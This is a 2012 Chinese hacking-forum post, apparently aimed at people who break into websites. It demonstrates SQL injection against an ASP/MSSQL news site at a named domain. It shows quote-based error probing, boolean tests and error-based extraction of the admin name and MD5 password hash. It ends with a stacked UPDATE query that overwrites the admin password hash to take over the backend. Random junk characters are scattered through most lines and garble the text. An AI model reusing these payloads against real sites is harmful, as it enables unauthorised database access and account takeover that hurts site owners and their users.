经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
( ^7 ~! \ K7 _% ?可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
; P- ~- E$ @/ ?" l测试如下:
, n, D/ X% u5 Y( Y, y; y$ t5 x9 ?http://www.tmdsb.com/news.asp?id=1213 l/ H- ?5 P k
在地址后输入单引号,显示1 ^/ j8 w' i0 r' t
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’( K. }6 o) d: r* f$ h
字符串 ’’’ 之前有未闭合的引号
6 ?; R+ J. O. [7 R/news/tmdws.asp,行637 \9 M! N4 p5 P: r5 q4 G
说明没有过滤单引号且数据库是MSSQL.
" s' r! u7 b2 Eand 1=1正常。and 1=2出错。肯定存在注入
# }$ H7 ?; t$ V$ n* B1 ~; q接着输入
4 V9 D4 O9 ]" m( t; Ihttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)! a9 d7 _- G% G! X: u1 k
得到帐号为:admin
* U6 o4 J% H. ohttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)1 ~. e G, X4 ~# g/ e
得到密码为:a4716077c2ba075c* K, g1 S s+ [9 W. C4 \4 p; }" Y
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f294337 \1 Y' |! b5 [& R% V
命令如下 :
% E7 l4 I& f! u4 k;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
) x/ q4 Z2 L }& r/ [这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
分享
支持
反对
发表于 2012-9-14 16:22:41